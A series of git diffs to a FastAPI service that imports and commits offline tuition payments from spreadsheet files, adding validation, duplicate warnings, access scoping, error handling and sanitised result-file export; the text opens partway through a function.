+            f"Lô #{batch_id} không ở trạng thái preview (hiện: {batch.status})"
+        )
+
+    system_user = await get_system_user(db)
+    if system_user.id == importer_id:
+        raise BusinessRuleViolation(
+            "Tài khoản import trùng system_user — vi phạm maker-checker"
+        )
+
+    method_ids = {
+        code: mid
+        for code, mid in (
+            await db.execute(
+                select(PaymentMethod.code, PaymentMethod.id).where(
+                    PaymentMethod.code.in_(["cash", "bank_transfer"]),
+                    PaymentMethod.is_active.is_(True),
+                )
+            )
+        ).all()
+    }
+
+    fee_repo = FeeRepository(db)
+    inv_repo = InvoiceRepository(db)
+
+    rows = list(
+        (
+            await db.execute(
+                select(PaymentImportRow)
+                .where(
+                    PaymentImportRow.batch_id == batch_id,
+                    PaymentImportRow.status.in_(
+                        [
+                            PaymentImportRowStatusEnum.matched.value,
+                            PaymentImportRowStatusEnum.warned.value,
+                        ]
+                    ),
+                )
+                .order_by(PaymentImportRow.row_no)
+            )
+        )
+        .scalars()
+        .all()
+    )
+
+    committed_count = 0
+    failed_count = 0
+    payment_count = 0
+    total_amount = Decimal("0")
+    cleared_profiles: Dict[int, str] = {}
+
+    for row in rows:
+        row_payment_ids: List[int] = []
+        row_total = Decimal("0")  # row-local (Bug 1: cộng tổng SAU khi savepoint OK)
+        row_cleared: Optional[tuple] = None
+        try:
+            async with db.begin_nested():
+                raw = row.raw or {}
+                method_code = METHOD_MAP.get(_norm_name(str(raw.get(COL_METHOD, ""))))
+                method_id = method_ids.get(method_code)
+                if method_id is None:
+                    raise BusinessRuleViolation("hình thức không hợp lệ")
+                pay_date = parse_date_vn(str(raw.get(COL_DATE, "")))
+                # date → datetime tz-aware (cột Payment.payment_date DateTime(tz)).
+                pay_dt = datetime(
+                    pay_date.year, pay_date.month, pay_date.day, tzinfo=timezone.utc
+                )
+                reference = _norm(str(raw.get(COL_REF, ""))) or None
+                # Defense: ref > String(100) → DataError ở flush không bắt được → 500
+                # cả lô. Bắt thành lỗi DÒNG (preview cũng đã chặn ở parse_template).
+                if reference is not None and len(reference) > MAX_REF_LEN:
+                    raise BusinessRuleViolation(
+                        f"mã tham chiếu quá dài (tối đa {MAX_REF_LEN} ký tự)"
+                    )
+                amount = row.amount
+                if amount is None or amount <= 0:
+                    raise BusinessRuleViolation("số tiền không hợp lệ")
+                if row.resolved_fee_id is None:
+                    raise BusinessRuleViolation("thiếu học phí đã resolve")
+
+                # payable invoices HIỆN TẠI (sắp installment_no asc).
+                payable = (
+                    await _fetch_payable_invoices(db, [row.resolved_fee_id])
+                ).get(row.resolved_fee_id, [])
+                if not payable:
+                    raise BusinessRuleViolation(
+                        "không còn đợt hóa đơn payable (đã thu đủ / đổi giữa 2 pha)"
+                    )
+
+                # Bug 3: lock TẤT CẢ invoice (asc) RỒI mới fee — khớp lock-order
+                # verify_payment (invoice→fee) cho dòng trải nhiều đợt → tránh deadlock
+                # ABBA (fee KHÔNG bị khóa GIỮA các invoice).
+                locked = []
+                for inv in payable:
+                    li = await inv_repo.get_for_update(inv.id, unit_id)
+                    if li is None:
+                        continue
+                    await db.refresh(li)
+                    locked.append(li)
+                if not locked:
+                    raise BusinessRuleViolation(
+                        "không tìm thấy hóa đơn (IDOR / đổi giữa 2 pha)"
+                    )
+                fee = await fee_repo.get_for_update(locked[0].fee_id, unit_id)
+                if fee is None:
+                    raise BusinessRuleViolation("không tìm thấy học phí")
+                await db.refresh(fee)
+                if fee.status in (
+                    FeeStatusEnum.cancelled.value,
+                    FeeStatusEnum.waived.value,
+                ):
+                    raise BusinessRuleViolation(
+                        f"học phí đã {fee.status} (đổi giữa 2 pha)"
+                    )
+                # Re-check lead chưa xóa mềm: preview lọc Lead.deleted_at IS NULL nhưng
+                # get_for_update KHÔNG lọc → chặn ghi tiền vào hồ sơ bị xóa mềm giữa
+                # preview→commit (mirror filter của _fetch_profiles).
+                lead_deleted = (
+                    await db.execute(
+                        select(models.Lead.deleted_at)
+                        .join(
+                            models.AdmissionProfile,
+                            models.AdmissionProfile.lead_id == models.Lead.id,
+                        )
+                        .where(models.AdmissionProfile.id == fee.admission_profile_id)
+                    )
+                ).scalar_one_or_none()
+                if lead_deleted is not None:
+                    raise BusinessRuleViolation(
+                        "hồ sơ đã bị xóa giữa preview→commit"
+                    )
+                was_hk1 = is_hk1_cleared(
+                    fee.fee_type, fee.semester_no, fee.status, fee.paid_amount
+                )
+
+                left = amount
+                for li in locked:
+                    if left <= 0:
+                        break
+                    if li.status not in PAYABLE_INVOICE_STATUSES:
+                        continue  # đổi trạng thái sau khi khóa
+                    principal_rem = (li.amount or Decimal("0")) - (
+                        li.paid_amount or Decimal("0")
+                    )
+                    if principal_rem <= 0:
+                        continue
+                    take = min(left, principal_rem)
+                    idem = f"bulkimport:{batch_id}:{row.row_no}:{li.id}"
+                    payment = await auto_verify_payment(
+                        db,
+                        invoice=li,
+                        fee=fee,
+                        method_id=method_id,
+                        amount=take,
+                        payment_date=pay_dt,
+                        reference=reference,
+                        importer_id=importer_id,
+                        system_user=system_user,
+                        idempotency_key=idem,
+                    )
+                    if payment is not None:
+                        row_payment_ids.append(payment.id)
+                        row_total += take
+                    left -= take
+
+                if left > 0:
+                    raise BusinessRuleViolation(
+                        f"thu {_money(amount)} vượt còn nợ gốc HIỆN TẠI "
+                        "(số dư đổi giữa preview→commit)"
+                    )
+
+                if not was_hk1:
+                    now_hk1 = is_hk1_cleared(
+                        fee.fee_type, fee.semester_no, fee.status, fee.paid_amount
+                    )
+                    if now_hk1:
+                        row_cleared = (
+                            fee.admission_profile_id,
+                            reference or f"BULK-{batch_id}-{row.row_no}",
+                        )
+                row.payment_ids = row_payment_ids
+            # savepoint committed → giờ mới cộng tổng (raise giữa chừng đã rollback DB).
+            committed_count += 1
+            payment_count += len(row_payment_ids)
+            total_amount += row_total
+            if row_cleared:
+                cleared_profiles[row_cleared[0]] = row_cleared[1]
+        except (
+            BusinessRuleViolation,
+            ResourceNotFoundError,
+            ValueError,
+            IntegrityError,
+        ) as exc:
+            failed_count += 1
+            row.status = PaymentImportRowStatusEnum.error.value
+            row.message = f"[commit] {exc}"[:1000]
+
+    # GỘP lead-sync (projection) 1 lần/hồ-sơ HK1 vừa cleared. Bug 2: bọc savepoint +
+    # try/except MỖI hồ-sơ — lỗi projection 1 hồ-sơ KHÔNG được hủy tiền đã ghi của CẢ
+    # lô (sync chạy trong body trước router commit; raise → outer rollback → mất tiền).
+    for profile_id, ref in cleared_profiles.items():
+        try:
+            async with db.begin_nested():
+                profile = await _load_profile_with_lead(db, profile_id)
+                if profile is not None:
+                    await sync_lead_tuition_paid(
+                        db=db,
+                        profile=profile,
+                        transaction_id=ref,
+                        changed_by_user_id=importer_id,
+                        reason=f"Thu học phí qua import lô #{batch_id}",
+                    )
+        except Exception as exc:  # noqa: BLE001
+            # KHÔNG hủy tiền đã ghi vì lỗi projection 1 hồ-sơ, NHƯNG log ERROR + stack
+            # trace (backend chưa có Sentry) để lỗi projection HỆ THỐNG không ẩn mình:
+            # tiền đã ghi mà lead đứng yên sts cũ phải lộ ra để truy.
+            log.error(
+                "bulk_commit_lead_sync_failed",
+                batch_id=batch_id,
+                profile_id=profile_id,
+                error=str(exc),
+                exc_info=True,
+            )
+
+    # Recompute counter theo trạng thái dòng THỰC TẾ sau commit (dòng có thể flip
+    # matched/warned → error lúc commit) để lịch sử lô khớp tiền THỰC ghi, không giữ
+    # số preview (overstate). `rows` chỉ gồm dòng matched/warned ở preview; preview-
+    # errors nằm ngoài nên cộng vào failed_count cũ.
+    batch.matched_count = sum(
+        1 for r in rows if r.status == PaymentImportRowStatusEnum.matched.value
+    )
+    batch.warned_count = sum(
+        1 for r in rows if r.status == PaymentImportRowStatusEnum.warned.value
+    )
+    batch.failed_count = batch.failed_count + failed_count
+    batch.total_amount = total_amount
+    # Chỉ đánh dấu 'committed' khi THỰC SỰ ghi được tiền. 0 dòng ghi (tất cả fail
+    # TOCTOU) → GIỮ 'preview' để re-import được (chưa có endpoint void; tránh khóa
+    # file vĩnh viễn qua partial-unique).
+    if committed_count > 0:
+        batch.status = PaymentImportBatchStatusEnum.committed.value
+        batch.committed_at = datetime.now(timezone.utc)
+    await db.flush()
+
+    result = CommitResult(
+        batch_id=batch_id,
+        committed_count=committed_count,
+        failed_count=failed_count,
+        payment_count=payment_count,
+        total_amount=total_amount,
+    )
+
+    async def post_commit() -> None:
+        # QUYẾT ĐỊNH SẢN PHẨM (đã chốt): bulk import KHÔNG gửi notification per-row
+        # (tránh fan-out 3N) — KHÁC verify tay (fire PAYMENT_RECEIVED mỗi payment).
+        # Lead-sync (projection) đã làm trong body. Nếu sau cần báo phụ huynh: thêm 1
+        # notif GỘP per-hồ-sơ + PHẢI seed notification_rule (nếu không sẽ fire-zero
+        # theo fail-closed dispatcher). Để trống là CỐ Ý, không phải thiếu sót.
+        return None
+
+    return result, post_commit
+
+
+# ---------------------------------------------------------------------------
+# Read helpers (response build + lịch sử lô)
+# ---------------------------------------------------------------------------
+async def load_batch_with_rows(
+    db: AsyncSession, batch_id: int
+) -> Tuple[Optional[PaymentImportBatch], List[PaymentImportRow]]:
+    """Lô + các dòng (sắp row_no) cho response build. ``(None, [])`` nếu không có."""
+    batch = (
+        await db.execute(
+            select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+        )
+    ).scalar_one_or_none()
+    if batch is None:
+        return None, []
+    rows = list(
+        (
+            await db.execute(
+                select(PaymentImportRow)
+                .where(PaymentImportRow.batch_id == batch_id)
+                .order_by(PaymentImportRow.row_no)
+            )
+        )
+        .scalars()
+        .all()
+    )
+    return batch, rows
+
+
+async def list_batches(
+    db: AsyncSession, *, unit_id: Optional[int], skip: int = 0, limit: int = 50
+) -> Tuple[List[PaymentImportBatch], int]:
+    """Lịch sử lô import (mới nhất trước), phân trang.
+
+    P1 IDOR: unit-scope (manager) chỉ thấy lô do user CÙNG ĐƠN VỊ tạo; admin/accountant
+    (unit_id=None) → toàn hệ.
+    """
+    count_q = select(func.count()).select_from(PaymentImportBatch)
+    list_q = select(PaymentImportBatch)
+    if unit_id is not None:
+        count_q = count_q.join(
+            models.User, PaymentImportBatch.created_by_id == models.User.id
+        ).where(models.User.unit_id == unit_id)
+        list_q = list_q.join(
+            models.User, PaymentImportBatch.created_by_id == models.User.id
+        ).where(models.User.unit_id == unit_id)
+    total = (await db.execute(count_q)).scalar_one()
+    items = list(
+        (
+            await db.execute(
+                list_q.order_by(
+                    PaymentImportBatch.created_at.desc(),
+                    PaymentImportBatch.id.desc(),
+                )
+                .offset(skip)
+                .limit(limit)
+            )
+        )
+        .scalars()
+        .all()
+    )
+    return items, total

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -22,6 +22,7 @@ import hashlib
 import io
 import re
 import unicodedata
+from collections import Counter
 from dataclasses import dataclass, field
 from datetime import date, datetime, timezone
 from decimal import Decimal, InvalidOperation, ROUND_HALF_UP
@@ -54,6 +55,7 @@ from app.models.finance import (
     TransactionTypeEnum,
 )
 from app.repositories.fee_repository import FeeRepository, InvoiceRepository
+from app.utils.csv_helpers import sanitize_csv_cell
 from app.utils.exceptions import (
     BadRequest,
     BusinessRuleViolation,
@@ -398,6 +400,30 @@ async def resolve_and_validate(
     fees = await _fetch_tuition_fees(db, [p.id for p in profiles.values()], semester_no)
     invoices_by_fee = await _fetch_payable_invoices(db, [f.id for f in fees.values()])
 
+    # G2 — code hình thức ĐANG hoạt động (mirror commit:1017). Parser đã loại method
+    # text lạ (:346); đây bắt method map-OK nhưng PaymentMethod inactive/missing → ERROR
+    # ngay ở preview (đối xứng commit, hết "khớp giả" rồi commit fail).
+    active_methods = {
+        c
+        for (c,) in (
+            await db.execute(
+                select(PaymentMethod.code).where(
+                    PaymentMethod.code.in_(["cash", "bank_transfer"]),
+                    PaymentMethod.is_active.is_(True),
+                )
+            )
+        ).all()
+    }
+    # G1 — đếm CCCD trùng (và CCCD+tiền trùng) trong file. Cái chốt money DUY NHẤT
+    # ("không thu vượt nợ gốc") KHÔNG bắt được trùng-còn-trong-nợ → thu khống. Cảnh báo
+    # (WARNING, không chặn — thu nhiều đợt là hợp lệ; kế toán quyết).
+    _valid = [
+        d for d in drafts
+        if not d.parse_error and CCCD_RE.match(d.citizen_id or "")
+    ]
+    cccd_counts = Counter(d.citizen_id for d in _valid)
+    cccd_amount_counts = Counter((d.citizen_id, d.amount) for d in _valid)
+
     # Sổ phân bổ trong batch: invoice_id -> tổng đã phân bổ ở các dòng TRƯỚC.
     batch_alloc: Dict[int, Decimal] = {}
     results: List[RowResult] = []
@@ -422,6 +448,12 @@ async def resolve_and_validate(
         # (6) CCCD định dạng
         if not CCCD_RE.match(d.citizen_id):
             res.message = "CCCD phải đúng 12 chữ số" if d.citizen_id else "thiếu CCCD"
+            results.append(res)
+            continue
+        # (G2) hình thức đã map (parser) nhưng PaymentMethod inactive/missing → ERROR sớm
+        # (commit:1017 cũng chặn → tránh "khớp giả" ở preview).
+        if d.method_code not in active_methods:
+            res.message = "hình thức chưa được kích hoạt trong hệ thống"
             results.append(res)
             continue
 
@@ -487,6 +519,20 @@ async def resolve_and_validate(
             warnings.append(
                 f"ngày thu {d.payment_date:%d/%m/%Y} lệch xa năm học {academic_year}"
             )
+
+        # (G1) CCCD xuất hiện nhiều dòng trong file → cảnh báo (không chặn). Nhấn mạnh khi
+        # CÙNG số tiền (nghi copy nhầm → thu khống), vì chốt "không vượt nợ" không bắt được.
+        dup_n = cccd_counts.get(d.citizen_id, 0)
+        if dup_n > 1:
+            if cccd_amount_counts.get((d.citizen_id, d.amount), 0) > 1:
+                warnings.append(
+                    f"CCCD xuất hiện {dup_n} dòng — CÙNG số tiền, nghi copy nhầm"
+                )
+            else:
+                warnings.append(
+                    f"CCCD xuất hiện {dup_n} dòng trong file — kiểm tra trùng "
+                    "(nếu thu nhiều đợt thì bỏ qua)"
+                )
 
         # FIFO allocate
         left = d.amount
@@ -1541,3 +1587,115 @@ async def list_batches(
         .all()
     )
     return items, total
+
+
+# ---------------------------------------------------------------------------
+# BV-5 R2/R1 — xem lại per-row + xuất file kết quả
+# ---------------------------------------------------------------------------
+async def get_batch_detail_scoped(
+    db: AsyncSession, batch_id: int, unit_id: Optional[int]
+) -> Tuple[PaymentImportBatch, List[PaymentImportRow]]:
+    """Lô + dòng, có IDOR unit-scope (mirror commit:998). Ngoài scope / không tồn tại
+    → ``ResourceNotFoundError`` (404, không lộ tồn tại)."""
+    batch, rows = await load_batch_with_rows(db, batch_id)
+    if batch is None:
+        raise ResourceNotFoundError("Không tìm thấy lô import")
+    if unit_id is not None:
+        creator_unit = (
+            await db.execute(
+                select(models.User.unit_id).where(
+                    models.User.id == batch.created_by_id
+                )
+            )
+        ).scalar_one_or_none()
+        if creator_unit != unit_id:
+            raise ResourceNotFoundError("Không tìm thấy lô import")
+    return batch, rows
+
+
+def _result_status_label(batch_status: str, row_status: str) -> str:
+    """Nhãn Trạng thái cho file kết quả — theo LÔ × DÒNG (P2: void KHÔNG "Thành công")."""
+    if row_status == PaymentImportRowStatusEnum.error.value:
+        if batch_status == PaymentImportBatchStatusEnum.committed.value:
+            return "Lỗi (không ghi)"
+        return "Lỗi"
+    # matched / warned
+    if batch_status == PaymentImportBatchStatusEnum.void.value:
+        return "Đã đảo"
+    if batch_status == PaymentImportBatchStatusEnum.committed.value:
+        return "Đã ghi"
+    return "Dự kiến ghi"  # preview
+
+
+_RESULT_EXTRA_COLS = ["Trạng thái", "Lý do", "Mã Payment", "Đã ghi (đồng)"]
+
+
+async def build_result_file(
+    db: AsyncSession, batch_id: int, fmt: str, unit_id: Optional[int]
+) -> Tuple[bytes, str, str]:
+    """File kết quả = NGUYÊN dòng gốc (`raw`) + cột Trạng thái/Lý do/Mã Payment/Đã ghi
+    → ``(content, media_type, filename)``. IDOR scope.
+
+    🔴 P1 chống formula injection: MỌI ô (raw = user nhập + header cột do file quyết) qua
+    ``sanitize_csv_cell`` (CSV + XLSX); XLSX thêm ``number_format='@'`` (text) phòng openpyxl
+    diễn giải chuỗi mở đầu '=' thành công thức.
+    """
+    batch, rows = await get_batch_detail_scoped(db, batch_id, unit_id)
+    committed_v = PaymentImportBatchStatusEnum.committed.value
+    written_statuses = (
+        PaymentImportRowStatusEnum.matched.value,
+        PaymentImportRowStatusEnum.warned.value,
+    )
+    # Header = cột gốc của file + cột kết quả. JSONB KHÔNG giữ thứ tự key → sắp theo
+    # TEMPLATE_COLS (cột template, đúng thứ tự file mẫu) rồi cột lạ (nếu có) ở cuối.
+    # Cột gốc do FILE quyết → cũng phải sanitize.
+    first_raw = rows[0].raw if rows and rows[0].raw else {}
+    if first_raw:
+        raw_keys = [c for c in TEMPLATE_COLS if c in first_raw] + [
+            k for k in first_raw if k not in TEMPLATE_COLS
+        ]
+    else:
+        raw_keys = list(TEMPLATE_COLS)
+    header = raw_keys + _RESULT_EXTRA_COLS
+
+    def _row_cells(r: PaymentImportRow) -> List[str]:
+        raw = r.raw or {}
+        label = _result_status_label(batch.status, r.status)
+        pay = ", ".join(str(p) for p in (r.payment_ids or []))
+        written = (
+            str(r.amount)
+            if (
+                batch.status == committed_v
+                and r.status in written_statuses
+                and r.amount is not None
+            )
+            else ""
+        )
+        cells = [raw.get(k, "") for k in raw_keys] + [label, r.message or "", pay, written]
+        return [sanitize_csv_cell(c) for c in cells]
+
+    fname = f"ket_qua_import_lo_{batch_id}"
+    if (fmt or "").lower() == "csv":
+        buf = io.StringIO()
+        writer = csv.writer(buf)
+        writer.writerow([sanitize_csv_cell(h) for h in header])
+        for r in rows:
+            writer.writerow(_row_cells(r))
+        content = ("﻿" + buf.getvalue()).encode("utf-8")  # BOM
+        return content, "text/csv; charset=utf-8", f"{fname}.csv"
+
+    from openpyxl import Workbook
+
+    wb = Workbook()
+    ws = wb.active
+    ws.title = "Ket qua"
+    ws.append([sanitize_csv_cell(h) for h in header])
+    for r in rows:
+        ws.append(_row_cells(r))
+    # Force TEXT mọi ô (chống injection + giữ số 0 đầu CCCD).
+    for ws_row in ws.iter_rows():
+        for cell in ws_row:
+            cell.number_format = "@"
+    bio = io.BytesIO()
+    wb.save(bio)
+    return bio.getvalue(), _XLSX_MEDIA, f"{fname}.xlsx"

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -35,7 +35,6 @@ from sqlalchemy.exc import IntegrityError
 from sqlalchemy.ext.asyncio import AsyncSession
 
 from app import models
-from app.core.constants import UserRole
 from app.models.finance import (
     Fee,
     Invoice,
@@ -407,7 +406,11 @@ async def resolve_and_validate(
     fees = await _fetch_tuition_fees(db, [p.id for p in profiles.values()], semester_no)
     fee_ids = [f.id for f in fees.values()]
     invoices_by_fee = await _fetch_payable_invoices(db, fee_ids)
-    invoice_statuses = await _fetch_invoice_status_sets(db, fee_ids)
+    # Chỉ cần status-set cho fee KHÔNG có hóa đơn payable (nhánh hiếm "đợt nháp / đã thu
+    # đủ / chưa có đợt"). File bình thường mọi fee đều payable → list rỗng → helper
+    # return {} ngay, KHÔNG tốn query trên đường happy-path.
+    no_payable_fee_ids = [fid for fid in fee_ids if fid not in invoices_by_fee]
+    invoice_statuses = await _fetch_invoice_status_sets(db, no_payable_fee_ids)
 
     # G2 — code hình thức ĐANG hoạt động (mirror commit:1017). Parser đã loại method
     # text lạ (:346); đây bắt method map-OK nhưng PaymentMethod inactive/missing → ERROR
@@ -911,32 +914,17 @@ def build_template(fmt: str) -> Tuple[bytes, str, str]:
 async def get_system_user(db: AsyncSession) -> "models.User":
     """Tài khoản kỹ thuật 'system' (checker cho auto-verify by policy).
 
-    Fingerprint-validated (khớp ``_get_system_application_fee_user`` admission_service):
-    username='system', status='inactive', role=user, email='system@qlts.internal',
-    unit_id=None. Maker-checker thỏa vì importer (kế toán) ≠ system_user (DB constraint
-    ``chk_payment_no_self_approval``).
+    DÙNG CHUNG resolver canonical ``_get_system_application_fee_user``
+    (admission_service) → **1 NGUỒN** fingerprint cho mọi luồng auto-verify by-policy
+    (lệ phí + bulk import), hết drift. Canonical chặt hơn (thêm check không có
+    UserUnitAssignment active + reuse ``_is_bcrypt_hash``). Maker-checker thỏa vì
+    importer (kế toán) ≠ system_user (``chk_payment_no_self_approval``).
+
+    (Eventual home: ``payment_service`` — plan §8.)
     """
-    user = (
-        await db.execute(select(models.User).where(models.User.username == "system"))
-    ).scalar_one_or_none()
-    if user is None:
-        raise ConflictError("Tài khoản kỹ thuật 'system' chưa được cấu hình")
-    # Fingerprint KHỚP ``_get_system_application_fee_user`` (admission_service): thêm
-    # current_assignment_id IS NULL + password là bcrypt thật → không nhận nhầm 1 tài
-    # khoản 'system' bị hạ cấp/chiếm dụng làm checker maker-checker.
-    if not (
-        user.status == "inactive"
-        and user.role == UserRole.USER
-        and user.email == "system@qlts.internal"
-        and user.unit_id is None
-        and user.current_assignment_id is None
-        # bcrypt thật = prefix $2a/$2b/$2y VÀ đủ dài (khớp _is_bcrypt_hash len>=50;
-        # tránh nhận '$2b$' cụt làm hợp lệ).
-        and len(user.password_hash or "") >= 50
-        and (user.password_hash or "").startswith(("$2a$", "$2b$", "$2y$"))
-    ):
-        raise ConflictError("Tài khoản kỹ thuật 'system' sai fingerprint")
-    return user
+    from app.services.admission_service import _get_system_application_fee_user
+
+    return await _get_system_application_fee_user(db)
 
 
 async def auto_verify_payment(

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -470,7 +470,7 @@ async def resolve_and_validate(
         # (3) học phí kỳ S, active-only — prefetch
         fee = fees.get(profile.id)
         if fee is None:
-            res.message = f"không có học phí HK{semester_no} đang hiệu lực"
+            res.message = f"hồ sơ chưa được thiết lập học phí HK{semester_no}"
             results.append(res)
             continue
         res.fee_id = fee.id
@@ -1245,15 +1245,24 @@ async def commit_batch(
             total_amount += row_total
             if row_cleared:
                 cleared_profiles[row_cleared[0]] = row_cleared[1]
-        except (
-            BusinessRuleViolation,
-            ResourceNotFoundError,
-            ValueError,
-            IntegrityError,
-        ) as exc:
+        except (BusinessRuleViolation, ResourceNotFoundError, ValueError) as exc:
+            # Lỗi nghiệp vụ/giá trị → message đã sạch (tiếng Việt) → hiện thẳng cho kế toán.
             failed_count += 1
             row.status = PaymentImportRowStatusEnum.error.value
-            row.message = f"[commit] {exc}"[:1000]
+            row.message = str(exc)[:500]
+        except Exception as exc:  # noqa: BLE001 — lỗi KHÔNG lường (DB/FK/IntegrityError…)
+            # KHÔNG nhét dump SQLAlchemy/asyncpg cho kế toán (xấu + lộ chi tiết kỹ thuật) →
+            # message generic + LOG đầy đủ cho dev. Savepoint per-row đã rollback dòng này
+            # nên các dòng khác vẫn ghi (cũng làm lô ROBUST: lỗi-lạ 1 dòng không abort cả lô).
+            log.error(
+                "bulk import commit: lỗi không lường khi ghi dòng",
+                batch_id=batch_id,
+                row_no=row.row_no,
+                error=str(exc),
+            )
+            failed_count += 1
+            row.status = PaymentImportRowStatusEnum.error.value
+            row.message = "lỗi hệ thống khi ghi dòng này — vui lòng liên hệ kỹ thuật"
 
     # GỘP lead-sync (projection) 1 lần/hồ-sơ HK1 vừa cleared. Bug 2: bọc savepoint +
     # try/except MỖI hồ-sơ — lỗi projection 1 hồ-sơ KHÔNG được hủy tiền đã ghi của CẢ
@@ -1616,6 +1625,7 @@ def _result_status_label(batch_status: str, row_status: str) -> str:
     return "Dự kiến ghi"  # preview
 
 
+COL_PROFILE_NAME = "Tên hồ sơ"  # tên hệ thống (Lead.full_name) — đối chiếu file
 _RESULT_EXTRA_COLS = ["Trạng thái", "Lý do", "Mã Payment", "Đã ghi (đồng)"]
 
 
@@ -1635,6 +1645,27 @@ async def build_result_file(
         PaymentImportRowStatusEnum.matched.value,
         PaymentImportRowStatusEnum.warned.value,
     )
+    # Cột "Tên hồ sơ" = tên hệ thống để kế toán đối chiếu cạnh "Họ và tên học sinh"
+    # của file (file có thể ghi lệch). Batch-query 1 lần (anti-N+1); dòng không
+    # resolve được hồ sơ → "(không có hồ sơ)".
+    profile_ids = {
+        r.resolved_profile_id for r in rows if r.resolved_profile_id is not None
+    }
+    profile_names: Dict[int, str] = {}
+    if profile_ids:
+        name_rows = await db.execute(
+            select(models.AdmissionProfile.id, models.Lead.full_name)
+            .join(models.Lead, models.AdmissionProfile.lead_id == models.Lead.id)
+            .where(models.AdmissionProfile.id.in_(profile_ids))
+        )
+        profile_names = {pid: (name or "") for pid, name in name_rows.all()}
+
+    def _profile_name(r: PaymentImportRow) -> str:
+        pid = r.resolved_profile_id
+        if pid is None:
+            return "(không có hồ sơ)"
+        return profile_names.get(pid) or "(không có hồ sơ)"
+
     # Header = cột gốc của file + cột kết quả. JSONB KHÔNG giữ thứ tự key → sắp theo
     # TEMPLATE_COLS (cột template, đúng thứ tự file mẫu) rồi cột lạ (nếu có) ở cuối.
     # Cột gốc do FILE quyết → cũng phải sanitize.
@@ -1645,7 +1676,11 @@ async def build_result_file(
         ]
     else:
         raw_keys = list(TEMPLATE_COLS)
-    header = raw_keys + _RESULT_EXTRA_COLS
+    # Chèn "Tên hồ sơ" NGAY SAU "Họ và tên học sinh" (đối chiếu cạnh nhau); file thiếu
+    # cột tên → đặt cuối phần cột gốc, ngay trước cột kết quả.
+    name_pos = raw_keys.index(COL_NAME) + 1 if COL_NAME in raw_keys else len(raw_keys)
+    display_cols = raw_keys[:name_pos] + [COL_PROFILE_NAME] + raw_keys[name_pos:]
+    header = display_cols + _RESULT_EXTRA_COLS
 
     def _row_cells(r: PaymentImportRow) -> List[str]:
         raw = r.raw or {}
@@ -1660,7 +1695,9 @@ async def build_result_file(
             )
             else ""
         )
-        cells = [raw.get(k, "") for k in raw_keys] + [label, r.message or "", pay, written]
+        base = [raw.get(k, "") for k in raw_keys]
+        base = base[:name_pos] + [_profile_name(r)] + base[name_pos:]
+        cells = base + [label, r.message or "", pay, written]
         return sanitize_csv_row(cells)  # = [sanitize_csv_cell(c) for c in cells]
 
     fname = f"ket_qua_import_lo_{batch_id}"

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -1,39 +1,51 @@
 # app/services/payment_import_service.py
 """
-Payment Import Service (BV-2) - parse + resolve/validate (READ-ONLY preview).
+Payment Import Service (BV-2) - parse + resolve/validate + lưu batch preview.
 
 Kế toán thu offline → import file mẫu → hệ thống đối chiếu từng dòng theo CCCD,
 phân bổ FIFO (chỉ GỐC học phí) và phân loại MATCHED / WARNING / ERROR. BV-2 KHÔNG
-ghi Payment — chỉ đọc + tính + (tùy chọn) lưu batch 'preview' để xem trước.
+ghi Payment — chỉ đọc + tính + lưu batch 'preview' để xem trước (pha commit ghi
+tiền nằm ở BV-3).
 
-Ref: Documents/BULK_PAYMENT_IMPORT_VERIFY_PLAN.md (DESIGN v2). 7 điểm bắt buộc:
-1. đọc dtype=str CCCD/ref/amount · 2. method 'bank_transfer' · 3. fee active-only
-· 4. FIFO principal-first · 5. chống double-alloc trong batch · 6. IDOR + CCCD lỗi
-sạch · 7. resolve read-only thuần.
+Ref: Documents/BULK_PAYMENT_IMPORT_VERIFY_PLAN.md (DESIGN v2). Bất biến bắt buộc:
+  1. đọc ``dtype=str`` CCCD/ref/amount (giữ số 0 đầu, không float)
+  2. method 'cash'/'bank_transfer' (seed thực, KHÔNG 'bank')
+  3. fee tuition active-only (NOT IN cancelled/waived) + đúng năm qua hồ sơ
+  4. FIFO principal-first: principal_remaining = invoice.amount − paid_amount
+     (KHÔNG remaining_amount vì gồm penalty)
+  5. sổ phân bổ in-batch chống double-alloc khi 2 dòng cùng CCCD+kỳ
+  6. IDOR unit-scope + bỏ lead xóa mềm + CCCD lỗi sạch
+  7. resolve read-only thuần (không ghi gì trong resolve_and_validate)
 """
+import csv
 import hashlib
 import io
 import re
 import unicodedata
 from dataclasses import dataclass, field
-from datetime import date, datetime, timezone
-from decimal import Decimal, InvalidOperation
-from typing import Dict, List, Optional
+from datetime import date, datetime
+from decimal import Decimal, InvalidOperation, ROUND_HALF_UP
+from typing import Dict, List, Optional, Tuple
 
 import pandas as pd
 import structlog
 from sqlalchemy import select
+from sqlalchemy.exc import IntegrityError
 from sqlalchemy.ext.asyncio import AsyncSession
 
 from app import models
 from app.models.finance import (
-    Fee, Invoice, PaymentMethod, FeeStatusEnum,
-    InvoiceStatusEnum, PAYABLE_INVOICE_STATUSES,
-    PaymentImportBatch, PaymentImportRow,
-    PaymentImportBatchStatusEnum, PaymentImportRowStatusEnum,
+    Fee,
+    Invoice,
+    FeeStatusEnum,
+    PAYABLE_INVOICE_STATUSES,
+    PaymentImportBatch,
+    PaymentImportRow,
+    PaymentImportBatchStatusEnum,
+    PaymentImportRowStatusEnum,
 )
 from app.utils.csv_helpers import sanitize_csv_cell
-from app.utils.exceptions import BadRequest
+from app.utils.exceptions import BadRequest, ConflictError
 
 log = structlog.get_logger(__name__)
 
@@ -49,13 +61,26 @@ COL_REF = "Mã tham chiếu"
 COL_NOTE = "Ghi chú"
 
 REQUIRED_COLS = [COL_CCCD, COL_AMOUNT, COL_DATE, COL_METHOD]
-TEMPLATE_COLS = [COL_CCCD, COL_NAME, COL_AMOUNT, COL_DATE, COL_METHOD, COL_REF, COL_NOTE]
+TEMPLATE_COLS = [
+    COL_CCCD,
+    COL_NAME,
+    COL_AMOUNT,
+    COL_DATE,
+    COL_METHOD,
+    COL_REF,
+    COL_NOTE,
+]
 
 # Hình thức → PaymentMethod.code thực (seed fin20260131002): cash / bank_transfer.
+# Input đã qua _norm_name (bỏ dấu + lower) TRƯỚC khi tra map → chỉ cần key KHÔNG dấu
